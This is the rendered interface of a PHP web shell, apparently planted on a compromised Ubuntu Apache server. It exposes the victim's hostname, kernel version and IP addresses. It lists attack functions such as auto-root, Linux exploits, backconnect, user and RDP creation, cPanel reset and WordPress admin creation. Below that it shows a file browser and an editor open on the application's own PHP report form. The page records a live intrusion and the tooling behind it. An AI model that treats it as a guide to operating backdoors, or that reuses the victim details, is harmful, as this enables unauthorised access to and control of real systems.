Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 13.59.196.41
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
applicantselection /
[ HOME SHELL ]
Name
Size
Permission
Action
111ajaxview.php
1.24
KB
-rw-r--r--
222report_indproduct_sale.php
4.05
KB
-rw-r--r--
ajaxapplicant.php
4.72
KB
-rw-r--r--
ajaxselection.php
2.88
KB
-rw-r--r--
applicant_callingpage.php
419
B
-rw-r--r--
applicant_editor.php
5.83
KB
-rw-r--r--
applicantselection.php
3.7
KB
-rw-r--r--
applicantselection_editor.php
2.9
KB
-rw-r--r--
applicantselection_list.php
6.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 222report_indproduct_sale.php
<?php session_start(); include("../layout/header.php"); include("../layout/navbar.php"); include("../layout/sidebar.php"); //include connection file include("../common/config.php"); ?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <br/> <br/> <!-- Main content --> <section class="content"> <div class="container-fluid"> <!-- Row --> <div class="row"> <div class="col-md-6 offset-md-3"> <!-- Horizontal Form --> <div class="card card-info"> <div class="card-header"> <h3 class="card-title">Individual Product Sales</h3> </div> <!-- /.card-header --> <!-- form start --> <form class="form-horizontal" id="form_report" name="form_gname" method="post" action="rep_indproduct_sale.php" target="_blank" enctype="multipart/form-data"> <div class="card-body"> <div class="form-group row"> <label for="gname" class="col-sm-3 col-form-label text-right">Product Name</label> <div class="col-sm-7"> <input type="text" class="form-control" id="pname" name="pname" value=""> </div> <div class="col-sm-2"> <input type="text" class="form-control" id="productlist_id" name="productlist_id" value=""> </div> </div> <div class="form-group row"> <label for="unit" class="col-sm-3 col-form-label text-right">From</label> <div class="col-sm-4"> <input type="text" class="form-control" id="frmdate" name="frmdate" value=""> </div> <label for="unit" class="col-sm-1 col-form-label text-right">To</label> <div class="col-sm-4"> <input type="text" class="form-control" id="dateto" name="dateto" value=""> </div> </div> <div class="form-group row"> <label for="submit" class="col-sm-3 col-form-label"> </label> <div class="col-sm-9"> <button type="submit" class="btn btn-info">Submit</button> </div> </div> </div> <!-- /.card-body --> </form> </div> <!-- END FORM/.card --> </div> </div> <!-- /.row --> </div><!-- /.container-fluid --> </section> <!-- /.content --> <?php include("../layout/footer.php"); include("../layout/script.php"); ?> <script> $(function () { $('#frmdate').datepicker({ dateFormat:"dd/mm/yy", changeMonth: true, changeYear: true, yearRange: "1955:2040" }) $('#dateto').datepicker({ dateFormat:"dd/mm/yy", changeMonth: true, changeYear: true, yearRange: "1955:2040" }) //Value Retrive From Product Table $( function() { $( "#pname" ).autocomplete({ source: function( request, response ) { $.ajax({ url: "../salesdetails/ajaxview.php", type: 'post', dataType: "json", data: { search: request.term }, success: function( data ) { response( data ); } }); }, select: function (event, ui) { $('#pname').val(ui.item.label); // display the selected text $('#productlist_id').val(ui.item.value); // save selected id to input return false; }, open: function(event, ui) { $(".ui-autocomplete").css("z-index", 1000); }, }); }); function split( val ) { return val.split( /,\s*/ ); } }); </script>
Close